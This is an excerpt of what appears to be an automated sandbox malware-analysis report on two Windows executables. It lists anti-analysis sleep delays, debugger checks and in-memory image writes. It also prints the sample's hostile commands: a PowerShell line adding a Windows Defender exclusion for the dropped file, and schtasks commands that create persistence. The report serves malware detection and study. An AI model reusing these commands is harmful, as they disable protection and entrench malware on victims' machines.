            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xjXWSRbLn.exe PID: 7700, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040E18D Sleep,ExitProcess,13_2_0040E18D
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: 99C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: A9C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: B9C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: 4E90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: 9240000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: A240000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: A450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory allocated: B450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_004186FE
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8063Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1559Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeWindow / User API: threadDelayed 1841Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeWindow / User API: threadDelayed 8152Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeAPI coverage: 5.0 %
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exe TID: 7648Thread sleep count: 1841 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exe TID: 7648Thread sleep time: -5523000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exe TID: 7648Thread sleep count: 8152 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exe TID: 7648Thread sleep time: -24456000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040838E
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004087A0
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00407848
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004068CD FindFirstFileW,FindNextFileW,13_2_004068CD
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0044BA59 FindFirstFileExA,13_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406D28
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Nfi2yQDBda.exe, 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004327AE
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041A8DA
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004407B5 mov eax, dword ptr fs:[00000030h]13_2_004407B5
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,13_2_00410763
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004327AE
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004328FC SetUnhandledExceptionFilter,13_2_004328FC
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004398AC
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00432D5C
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMemory written: C:\Users\user\Desktop\Nfi2yQDBda.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMemory written: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_00410B5C
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004175E1 mouse_event,13_2_004175E1
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Users\user\Desktop\Nfi2yQDBda.exe "C:\Users\user\Desktop\Nfi2yQDBda.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
